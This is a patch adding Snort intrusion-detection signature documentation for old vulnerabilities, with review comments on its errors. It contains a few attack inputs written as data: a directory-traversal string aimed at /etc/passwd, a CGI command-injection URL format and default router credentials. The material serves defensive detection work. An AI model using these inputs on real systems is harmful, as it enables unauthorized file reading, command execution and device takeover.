+This event is generated when an attacker includes "/whereami.cgi" in a URL, typically aimed at a web server running the CCBill software. 
+
+--
+Impact:
+Execution of arbitrary commands.
+
+--
+Detailed Information:
+The CCBill software is available to manage credit card information for UNIX and Windows hosts.  The script whereami.cgi is used for technical support of the software.  A vulnerability exists in the whereami.cgi script that allows the execution of arbitrary commands from an attacker who passes a command via whereami.cgi?g=command format in a URL.  Supplied commands can list file names, show the contents of the password file, or install a backdoor to name a few actions that an attacker may attempt.
+
+--
+Affected Systems:
+Hosts running CCBill software that has the whereami.cgi in the server's CGI path.
+
+--
+Attack Scenarios:
+An attacker can send a request to execute an arbitrary command.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Remove the whereami.cgi command.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+bugtraq
+http://www.securityfocus.com/bid/8095
+
+--
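Review bot: Corrective Action "Remove the whereami.cgi command." should say "script" (Detailed Information correctly calls whereami.cgi a script), and removal is only a workaround; adding "Apply the vendor supplied patch, if available" would bring it in line with the other files. The reference label "bugtraq" is lowercase while the other files use "Bugtraq".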
--- /dev/null
+++ b/doc/signatures/955.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+955
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	Systems using Microsoft FrontPage Server Extensions 98
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft:
+http://support.microsoft.com/default.aspx?scid=http://support.microsoft.com:80/support/kb/articles/Q188/2/57.ASP&NoWebContent=1&NoWebContent=1
+
+--
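Review bot: the Microsoft reference URL looks mangled: it nests a second URL inside the scid= parameter and repeats "&NoWebContent=1" twice. Please verify it resolves and reduce it to the plain KB form used elsewhere in this patch ("http://support.microsoft.com/default.aspx?scid=kb;en-us;Q..."). "attackers choosing" in Impact should be "attacker's choosing". Affected Systems restricts the scope to "FrontPage Server Extensions 98" while Summary and Detailed Information say just "FrontPage Server Extensions"; make the two agree.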
--- /dev/null
+++ b/doc/signatures/3028.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+3028
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Samba implementation.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Samba is a file and print serving system for heterogenous networks. It
+is available for use as a service and client on UNIX/Linux systems and as
+a client for Microsoft Windows systems.
+
+Samba uses the SMB/CIFS protocols to allow communication between client
+and server. The SMB protocol contains many commands and is commonly used
+to control network devices and systems from a remote location. A
+vulnerability exists in the way the smb daemon processes commands sent by
+a client system when accessing resources on the remote server.The problem
+exists in the allocation of memory which can be exploited by an attacker
+to cause an integer overflow, possibly leading to the execution of
+arbitrary code on the affected system with the privileges of the user
+running the smbd process.
+
+--
+Affected Systems:
+	Samba 3.0.8 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to supply specially crafted data to the smb daemon to
+overflow a buffer containing the information for the access control lists
+to be applied to files in the smb query.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
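Review bot: typos in Detailed Information: "heterogenous" should be "heterogeneous", and "remote server.The problem" is missing the space after the period. The same section calls the flaw an integer overflow in memory allocation, while Attack Scenarios says the attacker must "overflow a buffer" holding ACL data; tighten the wording so both describe the same bug. Affected Systems gives a concrete range ("Samba 3.0.8 and prior") yet Additional References is empty; the vendor advisory should be cited. The "Rule: ", "Sid: " and "-- " headers carry trailing whitespace.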
--- /dev/null
+++ b/doc/signatures/3283.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3283
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
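Review bot: Attack Scenarios ("a request for a file with an overly long filename via a network share") does not match Detailed Information, which describes malformed data sent to an RPC port; one of the two was written for a different rule. "Expoit" in Ease of Attack should be "Exploit". Apart from the Sid this file is a verbatim copy of 3215.txt and 3213.txt later in the patch; the Summary should state what distinguishes sid 3283 from those two, otherwise readers cannot tell the three events apart. Additional References is empty although Corrective Action refers to vendor patches.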
--- /dev/null
+++ b/doc/signatures/111-8.txt
@@ -0,0 +1,58 @@
+Rule: 
+
+--
+Sid: 
+111-8
+
+-- 
+Summary: 
+This event is generated when the pre-processor stream4
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+This may indicate scanning activity.
+
+--
+Detailed Information:
+The pre-processor stream4 has detected network traffic that may indicate
+a FIN stealth scan is in progress. That is, packets with the FIN flag
+set have been detected that are not part of a normal TCP stream.
+
+--
+Affected Systems:
+	All systems
+
+--
+Attack Scenarios: 
+An attacker may utilize scanning techniques to determine possible points
+of exploitation against a host.
+
+-- 
+Ease of Attack: 
+Simple. Many scanning tools exist.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+Corrective Action:
+Check the target host for signs of compromise.
+
+Ensure the system is up to date with any appropriate vendor supplied patches.
+
+--
+Contributors:
+Martin Roesch <roesch@sourcefire.com>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/279.txt
@@ -0,0 +1,59 @@
+Rule:  
+
+--
+Sid:
+279
+
+--
+Summary:
+This event is generated when an attempt is made to issue a Denial of 
+Service attack that causes Bay/Nortel Nautical Marlin bridges to crash.
+
+--
+Impact:
+Denial of Service. Network traffic can be disrupted.
+
+--
+Detailed Information:
+Nautica Marlin bridges will crash if a UDP packet is received on the 
+SNMP port (161) which has a data length of 0.
+
+--
+Affected Systems:
+	Bay/Nortel Nautica Marlin Bridges
+
+--
+Attack Scenarios:
+The bridges can be crashed remotely.  The offending packet uses UDP 
+(which is not connection oriented) and can be easily spoofed. 
+
+--
+Ease of Attack:
+Simple.  Tools are available that can exploit this vulnerability.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block connections to port 161 from unauthorized hosts using firewall or 
+router ACLs.  The release notes for the only available upgrade for this 
+product do not mention this vulnerability.  The product has been 
+discontinued.  
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+
+-- 
+Additional References:
+
+--
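Review bot: the product name is inconsistent: Summary says "Bay/Nortel Nautical Marlin bridges" while Detailed Information and Affected Systems say "Nautica Marlin"; pick one spelling. "Steven Alexander<alexander.s@mccd.edu>" is missing the space before the address. Additional References is empty for a DoS with a precisely stated trigger (zero-length UDP datagram to port 161); cite a reference if one exists. Several lines end in trailing whitespace.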
--- /dev/null
+++ b/doc/signatures/692.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid: 
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an SQL database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained administrator access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an SQL database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+--
+
+Attack Scenarios: 
+Simple. These are SQL database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Disallow direct access to the SQL server from sources external to the protected network.
+
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
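Review bot: the Sid field is empty; every other file in this patch carries the rule id and the file name is 692.txt, so fill it in. The sentence "This connection can either be a legitimate telnet connection or the result of spawning a remote shell..." reads as pasted from a telnet-rule document and contradicts the surrounding text, which is about SQL commands; remove or rewrite it. "Attack Scenarios: Simple. These are SQL database commands." answers Ease of Attack rather than describing a scenario (e.g. an attacker who has obtained a database login issuing the command remotely). The Affected Systems section present in every other file is missing, and the second Corrective Action item lacks a terminating period.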
--- /dev/null
+++ b/doc/signatures/2150.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 2150
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a weakness in a php application. 
+
+--
+Impact:
+Arbitrary code execution.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a vulnerability in a ttCMS or ttForum PHP application.
+
+It is possible for an attacker to include a PHP file of his choosing via a URL in ttCMS or ttForum PHP applications, the script is processed and executed with the privileges of the user running the webserver. This is due to poor checking of user supplied variables in the News.php and Install.php scripts.
+
+The vendor for these applications states that exploitation is not possible. However, proof of concepts for these issues have been circulated.
+
+--
+Affected Systems:
+Any host using ttCMS or ttForum.
+
+--
+Attack Scenarios:
+An attacker could include a PHP file of his choice by including the file name in a URI supplied to the webserver that would in turn process the script via either News.php or Install.php.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the php implementation on the host.
+
+Check the webserver log files for signs of this activity.
+
+Where possible, ensure the webserver is run as an unprivileged process.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/7542
+http://www.securityfocus.com/bid/7543
+
+
+--
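Review bot: "Sid: 2150" puts the id on the header line, whereas every other file places it on the line after "Sid:"; anything that parses these documents by section will read an empty Sid here, so move the value to its own line and drop the extra blank line that follows. "php application" in Summary should be "PHP application" as in Detailed Information. Corrective Action "Check the php implementation on the host." is too vague to act on; say what to check, e.g. that the PHP configuration does not allow including files from remote URLs, and add "Apply the appropriate vendor supplied patches" for ttCMS/ttForum.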
--- /dev/null
+++ b/doc/signatures/3215.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3215
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
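Review bot: same problems as 3283.txt, of which this file is a copy apart from the Sid: Attack Scenarios describes an overly long filename over a network share while Detailed Information describes malformed RPC DCOM data, "Expoit" should be "Exploit", and Additional References is empty. Please state in the Summary what sid 3215 specifically matches so it can be told apart from 3283 and 3213.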
--- /dev/null
+++ b/doc/signatures/2206.txt
@@ -0,0 +1,57 @@
+Rule:  
+
+--
+Sid:
+2206
+
+--
+Summary:
+This event is generated when an attempt is made to access ezman.cgi on an internal web server. This may indicate an attempt to exploit a buffer overflow vulnerability in EasyBoard 2000 1.27.
+
+--
+Impact:
+Remote execution of arbitrary code, possibly leading to remote root compromise.
+
+--
+Detailed Information:
+EasyBoard 2000 (EZBoard) is CGI-based bulletin board software for web servers. It contains a vulnerability that allows a malicious user to craft an HTTP request that causes a buffer overflow condition on the web server, and can overwrite system memory with data included in the URL. This enables the attacker to execute arbitrary code on the server with the security context of the web server.
+
+
+--
+Affected Systems:
+Systems running EasyBoard 2000 1.27.
+
+--
+Attack Scenarios:
+An attacker sends a specially crafted HTTP request to ezman.cgi on a vulnerable web server, creating a buffer overflow condition. The attacker is then able to execute arbitrary code with the security context of the web server. 
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+If a legitimate remote user accesses ezman.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+It is not known if this vulnerability has been patched by the vendor. However, Jin Ho Yu has submitted a third-party fix to the Bugtraq list. See http://marc.theaimsgroup.com/?l=bugtraq&m=101345069220199&w=2 for ezboard-fix.pl. 
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/4068
+
+--
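Review bot: Detailed Information ends with two blank lines where the other files use one; remove the extra one. Since the Summary already names a precise version (EasyBoard 2000 1.27) and Corrective Action says vendor patch status is unknown, it would help to restate the only available mitigation there in one line ("apply the third-party ezboard-fix.pl or remove ezman.cgi") so readers do not have to follow the mailing-list link to find it.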
--- /dev/null
+++ b/doc/signatures/1462.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1462
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
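Review bot: "running ona web server" in Detailed Information should be "running on a web server", and "attackers choosing" (twice) should be "attacker's choosing". The body is identical to 839.txt and 1461.txt and never says which CGI application or request pattern sid 1462 matches, and Additional References is empty, so the reader cannot identify the vulnerability behind the event. The line ending "exploited by the attacker." overruns the wrap width.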
--- /dev/null
+++ b/doc/signatures/288.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+288
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer 
+overflow in the POP3 service on Linux systems.
+
+--
+Impact:
+An attacker can gain access to a shell running with root privileges.
+
+--
+Detailed Information:
+This rule looks for a piece of shell code (executable code) that is
+used to exploit a known vulnerability in an older version of the POP3
+daemon distributed in Linux systems.
+
+--
+Affected Systems:
+Various Linux versions.
+
+--
+Attack Scenarios:
+The attack is done remotely and gives the attacker a command shell
+running with root privileges.
+
+--
+Ease of Attack:
+Simple.  An exploit is readily available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Install the available security patches from your linux vendor.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+
+--
+Additional References:
+
+--
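Review bot: Affected Systems ("Various Linux versions.") and Detailed Information ("an older version of the POP3 daemon distributed in Linux systems") never name the daemon or the vulnerable versions, so an administrator cannot tell whether a host is affected; name them if known and add a reference, since Additional References is empty. "linux vendor" should be "Linux vendor", and "Steven Alexander<alexander.s@mccd.edu>" is missing the space before the address.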
--- /dev/null
+++ b/doc/signatures/3213.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3213
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
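Review bot: this is the third verbatim copy of the RPC DCOM text (see 3283.txt and 3215.txt) differing only in the Sid, with the same defects: Attack Scenarios (long filename via a network share) contradicts Detailed Information (malformed RPC data), "Expoit" should be "Exploit", and Additional References is empty. The Summary should say what sid 3213 specifically detects.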
--- /dev/null
+++ b/doc/signatures/591.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+591
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) ypupdated is listening.
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port ypupdated is using.  Attackers can also learn what versions of the ypupdated protocol are accepted by ypupdated.
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as ypupdated run.  The ypupdated RPC service allows clients to update maps for Network Information Service (NIS), formerly known as Sun Yellow Pages.  A vulnerability exists with improper validation associated with the 'make' command used to update changes, allowing the execution of arbitrary commands as root.  
+
+--
+Affected Systems:
+HP HP-UX 10.1, 10.10, 10.20
+IBM AIX 3.2, 4.1
+NEC EWS-UX/V, UP-UX/V 
+SGI IRIX 3.2, 3.3, 3.3.1, 3.3.2, 3.3.3, 4.0, 4.0.1, 4.0.2, 4.0.3, 4.0.4, 4.0.5, 5.0, 5.0.1, 5.1, 5.1.1, 5.2, 5.3, 6.0.1
+Sun SunOS 4.1, 4.1.1, 4.1.2, 4.1.3, 4.1.4
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where ypupdated runs.  This may be a precursor to accessing ypupdated.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access ypupdated, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for ypupdated, not probes of the ypupdated service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the ypupdated service itself. An attacker may attempt to go directly to the ypupdated port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/1749
+
+CERT
+http://www.cert.org/advisories/CA-1995-17.html
+
+Arachnids 
+http://www.whitehats.com/info/IDS125
+
+
+--
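Review bot: the Summary phrase "the Remote Procedure Call (RPC) ypupdated" reads awkwardly; "the ypupdated RPC service" matches the wording in Detailed Information. The reference label "Arachnids " and the "Simple.  " line carry trailing whitespace, and there are two blank lines before the closing "--" where the other files use one. Otherwise the False Negatives note correctly explains that only the portmapper probe is detected, which is the point a reader needs.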
--- /dev/null
+++ b/doc/signatures/2201.txt
@@ -0,0 +1,54 @@
+Rule:  
+
+--
+Sid:
+2201
+
+--
+Summary:
+This event is generated when an attempt is made to access download.cgi on an internal web server. This may indicate an attempt to exploit a directory traversal vulnerability in Matthew Wright's download.cgi 1.0.
+
+--
+Impact:
+Information disclosure.
+
+--
+Detailed Information:
+Matt Wright's Script Archive provides a File Download script which allows users to keep track of the number of file downloads for specific files. It contains a directory traversal vulnerability where an attacker can use directory traversal techniques ("../..," for instance) within the "f" parameter, and pass these values to download.cgi to view hidden files on the server.
+
+--
+Affected Systems:
+Any web server using download.cgi version 1.0 to track file downloads.
+
+--
+Attack Scenarios:
+An attacker crafts a download.cgi URL where f=../../../../../../etc/passwd and transmits it to a vulnerable server. If the parameter matches the location of the target server's password file, the attacker can view and download the file. The attacker can use this method to view any arbitrary file, and to browse the server to discover information that may be helpful in a future attack.
+
+--
+Ease of Attack:
+Simple. A proof of concept exists.
+
+--
+False Positives:
+If a legitimate remote user accesses download.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disable download.cgi.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+
+--
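Review bot: Additional References is empty even though the Summary names a specific product and version (Matthew Wright's download.cgi 1.0) and Ease of Attack says a proof of concept exists; add the Bugtraq or CVE entry the rule was written from, as the 2316 entry does, so an analyst can read the advisory. Two smaller points: the traversal example in Detailed Information is written `"../..,"` with the comma inside the quotes, which makes it look like part of the string, and the separator before Additional References is `-- ` with a trailing space while every other separator in the file is `--`.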
--- /dev/null
+++ b/doc/signatures/1461.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1461
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
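Review bot: the file never identifies which CGI application sid 1461 matches; Summary, Detailed Information and Affected Systems are all generic text about "a CGI web application", so an analyst reading the event cannot tell what was targeted or whether any of their hosts run it. Add the script name and the request content the rule matches on, and replace "All systems running CGI applications" with the actual affected software. Typos: "running ona web server" should be "running on a web server", and "attackers choosing" should be "attacker's choosing" (both occurrences). This text is repeated verbatim in 1994.txt later in the patch.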
--- /dev/null
+++ b/doc/signatures/2230.txt
@@ -0,0 +1,57 @@
+Rule:  
+
+--
+Sid:
+2230
+
+--
+Summary:
+This event is generated when an attempt is made to access the web 
+administration interface for a Netgear router using the default username
+and password.
+
+--
+Impact:
+Administrative access to the router
+
+--
+Detailed Information:
+Netgear routers have a default username and password of "admin" and 
+"password", if this is not changed by the administrator it is possible 
+for an attacker to gain administrative access to the router.
+
+--
+Affected Systems:
+	Netgear routers
+
+--
+Attack Scenarios:
+An attacker merely needs to login to the interface using the default 
+username and password via a web browser.
+
+--
+Ease of Attack:
+Simple. NO exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Change the username and password.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
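Review bot: False Positives says "None known", but the rule matches the default credentials themselves, so an administrator who has not yet changed them and logs in legitimately will fire this event; document that case so the analyst checks the source address instead of dismissing or escalating the alert blindly. Affected Systems ("Netgear routers") and the empty Additional References should name the models or firmware known to ship with admin/password. Minor: "NO exploit software required" is capitalised differently from the same sentence in 2327.txt, and the separator before Additional References has a trailing space.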
--- /dev/null
+++ b/doc/signatures/2489.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+2489
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow
+associated with eSignal software. 
+
+--
+Impact:
+A successful attack may allow the execution of arbitrary code with
+LOCAL_SYSTEM privilege on a vulnerable host.
+
+--
+Detailed Information:
+eSignal software provides real-time stock market data to client hosts.
+There is a vulnerability associated with eSignal that may cause a buffer overflow,
+permitting the execution of arbitrary code with the context of LOCAL_SYSTEM. 
+The buffer overflow occurs when a larger than expected data payload is supplied
+for certain message exchanges.
+
+--
+Affected Systems:
+eSignal versions 7.5 and 7.6
+
+--
+Attack Scenarios:
+An attacker can create and send a malformed eSignal message that may cause a buffer overflow and 
+allow the subsequent execution of arbitrary code with the context of LOCAL_SYSTEM.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+Bugtraq:
+http://www.securityfocus.com/bid/9978
+
+--
